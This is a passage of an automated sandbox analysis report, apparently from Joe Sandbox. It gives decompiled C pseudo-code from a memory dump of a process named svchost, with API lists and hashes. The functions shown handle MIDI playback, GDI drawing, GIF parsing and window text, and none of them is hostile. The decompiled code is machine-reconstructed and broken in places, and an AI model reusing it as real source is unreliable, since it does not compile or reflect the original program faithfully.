					E0043D380( *((intOrPtr*)(_t256 + 8)), _t263,  *((intOrPtr*)(_t256 + 8)));
					 *((intOrPtr*)(_t256 + 8)) = _t263;
					_t135 =  *((intOrPtr*)(_t256 + 4));
					if(_t135 == 0 || (0x30c30c31 * (_t263 - _t135) >> 0x20 >> 4) + (0x30c30c31 * (_t263 - _t135) >> 0x20 >> 4 >> 0x1f) < 2) {
						E00429B20(_t256,  *((intOrPtr*)(_t256 + 8)), 2 - E00429AF0(_t256),  &_v84);
					} else {
						if(E00429AF0(_t256) > 2) {
							E00429E30(_t256,  *((intOrPtr*)(_t256 + 4)) + 0xa8,  *((intOrPtr*)(_t256 + 8)));
						}
					}
					_v92 = 8;
					_v88 =  *((intOrPtr*)(_t262 + 0x14));
					_t139 = midiStreamProperty( *(_t262 + 0x1c),  &_v92, 0x80000001);
					if(_t139 == 0) {
						 *((intOrPtr*)(_t262 + 0x48)) = 0;
						_t257 = 1;
						 *(_t262 + 0x40) = 0;
						while(1) {
							 *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x80)) + 4 + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4)) = 0x400;
							_t143 = E00483003(0x400);
							_t268 = _t268 + 4;
							 *( *((intOrPtr*)(_t262 + 0x80)) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4) = _t143;
							_t236 =  *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2;
							_t146 =  *((intOrPtr*)(_t262 + 0x80));
							_t147 = _t146 + _t236 * 4;
							if( *((intOrPtr*)(_t146 + _t236 * 4)) == 0) {
								goto L10;
							}
							 *((intOrPtr*)(_t147 + 0x40)) = 0;
							 *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x80)) + 0x44 + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4)) = 0x400;
							 *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x80)) + 0x4c + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4)) = 0;
							 *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x80)) + 0x50 + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4)) = 0;
							_push( *((intOrPtr*)(_t262 + 0x80)) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4);
							_push(_t257);
							_t159 = E00428720(_t262);
							if(_t159 == 0) {
								L16:
								 *((intOrPtr*)(_t262 + 0x80)) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4->dwBytesRecorded =  *( *((intOrPtr*)(_t262 + 0x80)) + 0x48 + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4);
								if( *(_t262 + 0x3c) != 0) {
									L18:
									_t168 = midiStreamOut( *(_t262 + 0x1c),  *((intOrPtr*)(_t262 + 0x80)) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4, 0x40);
									if(_t168 != 0) {
										 *((intOrPtr*)( *_t262 + 4))(_t168);
										goto L23;
									} else {
										_t257 = 0;
										if(_v128 != 0) {
											L23:
											 *(_t262 + 0x40) = 0;
											 *(_t262 + 0x3c) = 1;
											return 1;
										} else {
											_t220 =  *(_t262 + 0x40) + 1;
											 *(_t262 + 0x40) = _t220;
											if(_t220 < 2) {
												continue;
											} else {
												 *(_t262 + 0x40) = 0;
												 *(_t262 + 0x3c) = 1;
												return 1;
											}
										}
									}
								} else {
									_t139 = midiOutPrepareHeader( *(_t262 + 0x1c),  *((intOrPtr*)(_t262 + 0x80)) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4, 0x40);
									if(_t139 != 0) {
										goto L9;
									} else {
										goto L18;
									}
								}
							} else {
								if(_t159 != 0xffffff99) {
									goto L10;
								} else {
									_v116 = 1;
									goto L16;
								}
							}
							goto L24;
						}
						goto L10;
					} else {
						L9:
						 *((intOrPtr*)( *_t262 + 4))(_t139);
						L10:
						return 0;
					}
				} else {
					_t184 = midiStreamOpen(_t128, __ecx + 0x44, 1, E004294D0, __ecx, 0x30000);
					if(_t184 == 0) {
						goto L3;
					} else {
						_push(_t184);
						 *((intOrPtr*)( *__ecx + 4))();
						return 0;
					}
				}
				L24:
			}































    0x00428eb0
    0x00428eb6
    0x00428ebd
    0x00428ec3
    0x00428ec7
    0x00428ef7
    0x00428f02
    0x00428f06
    0x00428f0a
    0x00428f0e
    0x00428f12
    0x00428f16
    0x00428f24
    0x00428f2a
    0x00428f2f
    0x00428f32
    0x00428f3b
    0x00428f40
    0x00428f43
    0x00428f48
    0x00428f7e
    0x00428f85
    0x00428f8f
    0x00428fa0
    0x00428fa0
    0x00428f8f
    0x00428fb6
    0x00428fbe
    0x00428fc2
    0x00428fca
    0x00428fde
    0x00428fe1
    0x00428fe6
    0x00428fee
    0x00429004
    0x00429008
    0x00429010
    0x00429025
    0x00429034
    0x00429037
    0x00429040
    0x00429045
    0x00000000
    0x00000000
    0x00429047
    0x0042905f
    0x00429078
    0x00429091
    0x004290af
    0x004290b0
    0x004290b1
    0x004290b8
    0x004290cb
    0x004290e7
    0x004290ef
    0x0042911e
    0x0042913d
    0x00429145
    0x0042917b
    0x00000000
    0x00429147
    0x0042914b
    0x0042914f
    0x0042917e
    0x00429183
    0x00429186
    0x00429190
    0x00429151
    0x00429154
    0x00429157
    0x0042915d
    0x00000000
    0x00429163
    0x00429168
    0x0042916b
    0x00429175
    0x00429175
    0x0042915d
    0x0042914f
    0x004290f1
    0x00429110
    0x00429118
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00429118
    0x004290ba
    0x004290bd
    0x00000000
    0x004290c3
    0x004290c3
    0x00000000
    0x004290c3
    0x004290bd
    0x00000000
    0x004290b8
    0x00000000
    0x00428fcc
    0x00428fcc
    0x00428fd1
    0x00428fd4
    0x00428fdd
    0x00428fdd
    0x00428ec9
    0x00428edb
    0x00428ee3
    0x00000000
    0x00428ee5
    0x00428ee7
    0x00428eea
    0x00428ef6
    0x00428ef6
    0x00428ee3
    0x00000000

    APIs
    • midiStreamOpen.WINMM(?,?,00000001,004294D0,?,00030000,?,?,?,00000000), ref: 00428EDB
    • midiStreamProperty.WINMM ref: 00428FC2
    • midiOutPrepareHeader.WINMM(?,?,00000040,00000001,?,?,?,?,00000000), ref: 00429110
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: midi$Stream$HeaderOpenPrepareProperty
    • String ID:
    • API String ID: 2061886437-0
    • Opcode ID: 554028de30fd090a4dcf25fa6e14741ac43f029ccdeed02f786ec0617b5a9cb7
    • Instruction ID: 9da555949d9da46b87808de96a6bf133a0d787d847d77e9708509d02c9e93ceb
    • Opcode Fuzzy Hash: 554028de30fd090a4dcf25fa6e14741ac43f029ccdeed02f786ec0617b5a9cb7
    • Instruction Fuzzy Hash: 76A17B713006168FD724DF28D990BAAB7F6FB84304F51492EE686C7650EB35F919CB40
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00426FC0 Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
    Download Yara Rule
    C-Code - Quality: 78%
    			E00426FC0(void* __ecx, signed long long __fp0) {
				void* _t50;
				signed char _t51;
				int _t54;
				int _t64;
				signed int _t66;
				int _t68;
				signed int _t70;
				signed int _t78;
				int _t79;
				signed int _t82;
				int _t83;
				int _t101;
				int _t103;
				void* _t106;
				void* _t107;
				signed long long _t116;

				_t114 = __fp0;
				_t106 = __ecx;
				GetClientRect( *(__ecx + 0x1c), _t107 + 0x30);
				_t103 =  *((intOrPtr*)(_t107 + 0x3c)) -  *((intOrPtr*)(_t107 + 0x34));
				_t50 = _t106 + 0xf8;
				_t101 =  *((intOrPtr*)(_t107 + 0x40)) -  *(_t107 + 0x38);
				 *(_t107 + 0x1c) = _t103;
				 *(_t107 + 0x20) = _t101;
				if(_t50 == 0 ||  *((intOrPtr*)(_t50 + 4)) == 0) {
					_t78 =  *(_t107 + 0x48);
				} else {
					_t78 =  *(_t107 + 0x48);
					 *(_t107 + 0x1c) = E00489512(_t78, _t50);
					PatBlt( *(_t78 + 4),  *(_t107 + 0x38),  *(_t107 + 0x38), _t103, _t101, 0xf00021);
					E00489512(_t78,  *(_t107 + 0x18));
				}
				_t51 =  *(_t106 + 0xf4);
				 *(_t107 + 0x18) = _t51;
				if(_t51 == 0) {
					L22:
					return 0x1335437;
				} else {
					if( *((intOrPtr*)(_t106 + 0x100)) != 1 ||  *_t51 != 5) {
						_t82 =  *(_t106 + 0xd0);
						 *(_t107 + 0x14) = 0;
						__eflags = _t82 - 2;
						 *(_t107 + 0x10) = 0;
						if(_t82 != 2) {
							__eflags = _t82;
							if(__eflags == 0) {
								_t79 = _t78 | 0xffffffff;
								_t83 = _t82 | 0xffffffff;
								__eflags = _t83;
							} else {
								_t79 = _t103;
								_t83 = _t101;
							}
						} else {
							_t79 =  *(_t51 + 4);
							_t83 =  *(_t51 + 8);
							__eflags = _t79 - _t103;
							 *(_t107 + 0x24) = _t79;
							 *(_t107 + 0x2c) = _t83;
							if(_t79 <= _t103) {
								_t68 = _t103;
								_t103 = _t79;
								 *(_t107 + 0x1c) = _t103;
								asm("cdq");
								_t70 = _t68 - _t79;
								__eflags = _t70;
								 *(_t107 + 0x14) = _t70 >> 1;
								_t51 =  *(_t107 + 0x18);
							}
							__eflags = _t83 - _t101;
							if(_t83 <= _t101) {
								_t64 = _t101;
								_t101 = _t83;
								 *(_t107 + 0x20) = _t101;
								asm("cdq");
								_t66 = _t64 - _t83;
								__eflags = _t66;
								 *(_t107 + 0x10) = _t66 >> 1;
								_t51 =  *(_t107 + 0x18);
							}
							__eflags = _t79 - _t103;
							if(_t79 > _t103) {
								L15:
								asm("fild dword [esp+0x24]");
								asm("fild dword [esp+0x1c]");
								asm("fild dword [esp+0x2c]");
								asm("fst qword [esp+0x24]");
								asm("fild dword [esp+0x20]");
								_t116 = _t114 / st1 / st1;
								 *(_t107 + 0x2c) = _t116;
								st0 = _t116;
								asm("fcom qword [esp+0x2c]");
								asm("fnstsw ax");
								__eflags = _t51 & 0x00000001;
								if((_t51 & 0x00000001) == 0) {
									st0 = _t116;
									_t116 =  *(_t107 + 0x2c);
								}
								asm("fxch st0, st1");
								_t54 = E00470388();
								_t114 =  *(_t107 + 0x24) * st1;
								_t79 = _t54;
								_t83 = E00470388();
								asm("cdq");
								st0 =  *(_t107 + 0x24) * st1;
								 *(_t107 + 0x14) =  *(_t107 + 0x14) + (_t103 - _t79 >> 1);
								asm("cdq");
								_t51 =  *(_t107 + 0x18);
								 *(_t107 + 0x10) =  *(_t107 + 0x10) + (_t101 - _t83 >> 1);
							} else {
								__eflags = _t83 - _t101;
								if(__eflags > 0) {
									goto L15;
								}
							}
						}
						_push( *((intOrPtr*)(_t106 + 0xdc)));
						_push(_t83);
						_push(_t79);
						_push( *(_t107 + 0x18));
						E00426120(__eflags, _t114, _t51,  *((intOrPtr*)(_t107 + 0x58)),  *(_t107 + 0x18));
						goto L22;
					} else {
						E0043A6C0(_t106, _t114, _t78);
						return 0x1335437;
					}
				}
			}



















    0x00426fc0
    0x00426fc5
    0x00426fd2
    0x00426fe4
    0x00426fea
    0x00426ff0
    0x00426ff2
    0x00426ff8
    0x00426ffc
    0x0042703e
    0x00427005
    0x00427005
    0x0042701d
    0x0042702a
    0x00427037
    0x00427037
    0x00427042
    0x0042704c
    0x00427050
    0x0042718b
    0x00427194
    0x00427056
    0x0042705d
    0x0042707b
    0x00427081
    0x00427085
    0x00427088
    0x0042708c
    0x00427157
    0x00427159
    0x00427161
    0x00427164
    0x00427164
    0x0042715b
    0x0042715b
    0x0042715d
    0x0042715d
    0x00427092
    0x00427092
    0x00427095
    0x00427098
    0x0042709a
    0x0042709e
    0x004270a2
    0x004270a4
    0x004270a6
    0x004270aa
    0x004270ae
    0x004270af
    0x004270af
    0x004270b3
    0x004270b7
    0x004270b7
    0x004270bb
    0x004270bd
    0x004270bf
    0x004270c1
    0x004270c5
    0x004270c9
    0x004270ca
    0x004270ca
    0x004270ce
    0x004270d2
    0x004270d2
    0x004270d6
    0x004270d8
    0x004270e2
    0x004270e2
    0x004270e6
    0x004270ec
    0x004270f0
    0x004270f4
    0x004270f8
    0x004270fa
    0x004270fe
    0x00427100
    0x00427104
    0x00427106
    0x00427109
    0x0042710b
    0x0042710d
    0x0042710d
    0x00427111
    0x00427115
    0x0042711e
    0x00427120
    0x00427127
    0x00427131
    0x00427132
    0x0042713e
    0x00427142
    0x0042714d
    0x00427151
    0x004270da
    0x004270da
    0x004270dc
    0x00000000
    0x00000000
    0x004270dc
    0x004270d8
    0x0042716d
    0x00427172
    0x00427177
    0x00427178
    0x00427180
    0x00000000
    0x00427064
    0x00427067
    0x00427078
    0x00427078
    0x0042705d

    APIs
    • GetClientRect.USER32(?,?), ref: 00426FD2
    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0042702A
    • __ftol.LIBCMT ref: 00427115
    • __ftol.LIBCMT ref: 00427122
      • Part of subcall function 00489512: SelectObject.GDI32(?,00000000), ref: 00489534
      • Part of subcall function 00489512: SelectObject.GDI32(?,?), ref: 0048954A
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ObjectSelect__ftol$ClientRect
    • String ID:
    • API String ID: 2514210182-0
    • Opcode ID: 3f3e95b9d2868db02fd8f6cfb5fe4685dc828623b49a579deca4b59512eea40c
    • Instruction ID: dba1a07e886497a340d2ae7955062ab8760e11ff337f9d6d2ffbce8923c81c9e
    • Opcode Fuzzy Hash: 3f3e95b9d2868db02fd8f6cfb5fe4685dc828623b49a579deca4b59512eea40c
    • Instruction Fuzzy Hash: 15519AB17083129BC714CF29D98086BBBE5BFD8340F548A2EF88993351D634DD498B96
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0043AF80 Relevance: 6.2, APIs: 4, Instructions: 162COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0043AF80(void* __ecx) {
				void* _t74;
				intOrPtr _t76;
				void* _t81;
				signed int _t92;
				void* _t93;
				void* _t98;
				void* _t107;
				signed int _t113;
				unsigned int _t125;
				signed int _t126;
				intOrPtr _t150;
				void* _t152;
				void* _t154;
				char* _t155;
				void* _t156;
				void* _t161;

				_t107 = __ecx;
				E0043A9B0(__ecx);
				_t72 =  *((intOrPtr*)(__ecx + 0xa8));
				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
					E0048302C(_t72);
					_t157 = _t157 + 4;
				}
				_t73 =  *(_t107 + 0xb0);
				if( *(_t107 + 0xb0) != 0) {
					E0048302C(_t73);
					_t157 = _t157 + 4;
				}
				_t74 =  *(_t107 + 0xc0);
				if(_t74 != 0) {
					DeleteObject(_t74);
					 *(_t107 + 0xc0) = 0;
				}
				_t150 =  *((intOrPtr*)(_t157 + 0x18));
				 *(_t107 + 0xb0) = 0;
				 *(_t107 + 0xa8) = 0;
				 *((intOrPtr*)(_t107 + 0x94)) = 0;
				 *(_t107 + 0x80) = 0;
				 *(_t107 + 0x74) = 0;
				if(_t150 <= 0xd) {
					L17:
					return 0;
				} else {
					_t155 =  *((intOrPtr*)(_t157 + 0x14));
					if( *_t155 != 0x47 ||  *((char*)(_t155 + 1)) != 0x49 ||  *((char*)(_t155 + 2)) != 0x46 ||  *((char*)(_t155 + 3)) != 0x38) {
						goto L17;
					} else {
						_t76 =  *((intOrPtr*)(_t155 + 4));
						if(_t76 == 0x37 || _t76 == 0x39) {
							if( *((char*)(_t155 + 5)) != 0x61) {
								goto L17;
							} else {
								 *((intOrPtr*)(_t107 + 0xd4)) = 0;
								 *((intOrPtr*)(_t107 + 0xd8)) = 0;
								 *((intOrPtr*)(_t107 + 0x70)) = 0;
								if(( *(_t155 + 0xa) & 0x00000080) == 0) {
									_t156 = _t155 + 0xd;
									goto L20;
								} else {
									 *(_t107 + 0x80) = 1;
									_t98 = E00483003(0xbadbaf);
									_t161 = _t157 + 4;
									 *(_t107 + 0xa8) = _t98;
									_t125 =  *(_t107 + 0x80) +  *(_t107 + 0x80) * 2;
									if(_t150 > _t125 + 0xd) {
										_t154 = _t155 + 0xd;
										_t126 = _t125 >> 2;
										memcpy(_t154 + _t126 + _t126, _t154, memcpy(_t98, _t154, _t126 << 2) & 0x00000003);
										_t157 = _t161 + 0x18;
										_t150 =  *((intOrPtr*)(_t161 + 0x30));
										_t156 =  *(_t107 + 0x80) + _t155 + 0xd +  *(_t107 + 0x80) * 2;
										L20:
										_t47 = _t150 -  *(_t107 + 0x80) +  *(_t107 + 0x80) * 2 - 0xd; // -13
										 *(_t107 + 0x74) = _t47;
										_t81 = E00483003(_t47);
										 *(_t107 + 0xb0) = _t81;
										 *(_t107 + 0xb4) = _t81;
										_t152 = _t156;
										_t113 =  *(_t107 + 0x74) >> 2;
										memcpy(_t152 + _t113 + _t113, _t152, memcpy(_t81, _t152, _t113 << 2) & 0x00000003);
										 *(_t107 + 0xcc) = 0;
										if( *((intOrPtr*)(_t107 + 0xe8)) == 0) {
											 *(_t107 + 0xa4) = GetDC( *(_t107 + 0x1c));
											 *(_t107 + 0xc0) = E0043B1B0(_t107);
											ReleaseDC( *(_t107 + 0x1c),  *(_t107 + 0xa4));
											 *(_t107 + 0xa4) = 0;
											_t92 = 0 |  *((intOrPtr*)(_t107 + 0x94)) -  *(_t107 + 0x74) - 0x00000001 >= 0x00000000;
											 *(_t107 + 0xcc) = _t92;
											if(_t92 == 0) {
												_t93 =  *(_t107 + 0xc0);
												if(_t93 != 0) {
													DeleteObject(_t93);
													 *(_t107 + 0xc0) = 0;
												}
												 *((intOrPtr*)(_t107 + 0x94)) = 0;
												 *(_t107 + 0xb4) =  *(_t107 + 0xb0);
											}
										}
										return 1;
									} else {
										E0048302C(_t98);
										 *(_t107 + 0xa8) = 0;
										 *(_t107 + 0x80) = 0;
										goto L17;
									}
								}
							}
						} else {
							goto L17;
						}
					}
				}
			}



















    0x0043af84
    0x0043af86
    0x0043af8b
    0x0043af95
    0x0043af98
    0x0043af9d
    0x0043af9d
    0x0043afa0
    0x0043afa8
    0x0043afab
    0x0043afb0
    0x0043afb0
    0x0043afb3
    0x0043afbb
    0x0043afbe
    0x0043afc4
    0x0043afc4
    0x0043afca
    0x0043afce
    0x0043afd7
    0x0043afdd
    0x0043afe3
    0x0043afe9
    0x0043afec
    0x0043b0a2
    0x0043b0a5
    0x0043aff2
    0x0043aff2
    0x0043affa
    0x00000000
    0x0043b01e
    0x0043b01e
    0x0043b023
    0x0043b02d
    0x00000000
    0x0043b02f
    0x0043b039
    0x0043b043
    0x0043b04c
    0x0043b055
    0x0043b0ce
    0x00000000
    0x0043b057
    0x0043b062
    0x0043b06c
    0x0043b077
    0x0043b07a
    0x0043b080
    0x0043b088
    0x0043b0ac
    0x0043b0af
    0x0043b0b9
    0x0043b0b9
    0x0043b0c1
    0x0043b0c8
    0x0043b0d1
    0x0043b0dc
    0x0043b0e0
    0x0043b0e3
    0x0043b0eb
    0x0043b0f1
    0x0043b0fb
    0x0043b0fd
    0x0043b10a
    0x0043b116
    0x0043b11c
    0x0043b12a
    0x0043b13b
    0x0043b146
    0x0043b15a
    0x0043b160
    0x0043b165
    0x0043b16b
    0x0043b16d
    0x0043b175
    0x0043b178
    0x0043b17e
    0x0043b17e
    0x0043b18a
    0x0043b190
    0x0043b190
    0x0043b16b
    0x0043b19f
    0x0043b08a
    0x0043b08b
    0x0043b093
    0x0043b099
    0x00000000
    0x0043b099
    0x0043b088
    0x0043b055
    0x00000000
    0x00000000
    0x00000000
    0x0043b023
    0x0043affa

    APIs
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: DeleteObject$Release
    • String ID:
    • API String ID: 2600533906-0
    • Opcode ID: 150b7a17ac9a971a76aa34ed861bf5bd673d52cc2d726e88396bc2dce610ea0f
    • Instruction ID: 26de1d5f3897bc6111eeebbaa207b04aaf65d5f64846e8174c675e45759ff76a
    • Opcode Fuzzy Hash: 150b7a17ac9a971a76aa34ed861bf5bd673d52cc2d726e88396bc2dce610ea0f
    • Instruction Fuzzy Hash: 00516FB19002049BDF14DF28C48079A77E5FF58300F08857AED59CF35ADB759949CBA5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040C490 Relevance: 6.1, APIs: 4, Instructions: 144windowCOMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E0040C490(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, int* _a8, int* _a12) {
				long _v0;
				int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v56;
				char _v64;
				int _v68;
				int _v72;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v108;
				intOrPtr _v112;
				char _v116;
				char _v120;
				intOrPtr _v132;
				int* _t51;
				void* _t52;
				int _t55;
				void* _t67;
				intOrPtr _t68;
				int* _t76;
				void* _t77;
				char _t88;
				char _t93;
				void* _t109;
				intOrPtr _t110;
				void* _t113;
				intOrPtr _t117;
				intOrPtr _t119;

				_t109 = __edi;
				_t77 = __ebx;
				_push(0xffffffff);
				_push(E0048DD58);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t119;
				_t113 = __ecx;
				_t81 =  *((intOrPtr*)(__ecx + 0x3c));
				if( *((intOrPtr*)(__ecx + 0x3c)) == 0) {
					L13:
					_t51 = _a8;
					 *_t51 = 0;
					 *[fs:0x0] = _v12;
					return _t51;
				} else {
					_t52 = E00487648(_t81);
					if(_t52 == 0) {
						 *_a8 = 0;
						 *[fs:0x0] = _v12;
						return _t52;
					} else {
						_t55 = IsWindowVisible( *( *((intOrPtr*)(__ecx + 0x3c)) + 0x1c));
						if(_t55 == 0) {
							 *_a8 = 0;
							 *[fs:0x0] = _v12;
							return _t55;
						} else {
							if( *((intOrPtr*)(_t113 + 0x40)) != 1) {
								_t117 =  *((intOrPtr*)(_t113 + 0x3c));
								_v100 = 1;
								_v96 = 1;
								_v108 =  *((intOrPtr*)(_t117 + 0xb0));
								_v104 =  *((intOrPtr*)(_t117 + 0xb4));
								_v72 = 0;
								_v68 = 0;
								_v92 = ((0 |  *((intOrPtr*)(_a4 + 0x10)) >= 0x00000000) - 0x00000001 & 0x000000fe) + 1;
								E00418A40(0x7d8,  &_v108, 0);
								goto L13;
							} else {
								_t88 =  *0x4b8924; // 0x4b8938
								_v120 = _t88;
								_v4 = 0;
								E0048564F( *((intOrPtr*)(_t113 + 0x3c)),  &_v120);
								E00481EBD(_t113,  &_v120,  &_v116);
								_t67 = E004709B8(_t113, _v132);
								if( *((intOrPtr*)(_v8 + 0x10)) >= 0) {
									_t93 = _v116;
									_t68 = _t67 + 1;
									if(_t68 < _t93 || _t68 > _v112) {
										goto L10;
									}
								} else {
									_t68 = _t67 - 1;
									_t93 = _v112;
									if(_t68 < _v116) {
										L10:
										_t68 = _t93;
									} else {
										if(_t68 > _t93) {
											goto L10;
										}
									}
								}
								wsprintfA( &_v64, 0x4acc9c, _t68, _t109, _t77);
								E0048754F( *((intOrPtr*)(_t113 + 0x3c)),  &_v56);
								_t110 =  *((intOrPtr*)(_t113 + 0x3c));
								SendMessageA( *(_t110 + 0x1c), 0xb1, 0, 0xffffffff);
								SendMessageA( *(_t110 + 0x1c), 0xb7, 0, 0);
								E0048768A( *((intOrPtr*)(_t113 + 0x3c)));
								_v0 = 0xffffffff;
								E004832C2( &_v116);
								_t76 = _a12;
								 *_t76 = 0;
								 *[fs:0x0] = _v8;
								return _t76;
							}
						}
					}
				}
			}


































    0x0040c490
    0x0040c490
    0x0040c496
    0x0040c498
    0x0040c49d
    0x0040c49e
    0x0040c4a9
    0x0040c4ab
    0x0040c4b0
    0x0040c637
    0x0040c637
    0x0040c63f
    0x0040c649
    0x0040c653
    0x0040c4b6
    0x0040c4b6
    0x0040c4bd
    0x0040c681
    0x0040c687
    0x0040c691
    0x0040c4c3
    0x0040c4ca
    0x0040c4d2
    0x0040c65e
    0x0040c668
    0x0040c672
    0x0040c4d8
    0x0040c4e2
    0x0040c5de
    0x0040c5ef
    0x0040c5f3
    0x0040c5fe
    0x0040c602
    0x0040c60b
    0x0040c626
    0x0040c62e
    0x0040c632
    0x00000000
    0x0040c4e8
    0x0040c4e8
    0x0040c4ee
    0x0040c4fa
    0x0040c502
    0x0040c513
    0x0040c51d
    0x0040c531
    0x0040c546
    0x0040c54a
    0x0040c54d
    0x00000000
    0x00000000
    0x0040c533
    0x0040c537
    0x0040c53a
    0x0040c53e
    0x0040c555
    0x0040c555
    0x0040c540
    0x0040c542
    0x00000000
    0x0040c544
    0x0040c542
    0x0040c53e
    0x0040c564
    0x0040c575
    0x0040c57a
    0x0040c590
    0x0040c59f
    0x0040c5a4
    0x0040c5ad
    0x0040c5b8
    0x0040c5bd
    0x0040c5c7
    0x0040c5d1
    0x0040c5db
    0x0040c5db
    0x0040c4e2
    0x0040c4d2
    0x0040c4bd

    APIs
      • Part of subcall function 00487648: IsWindowEnabled.USER32(?), ref: 00487652
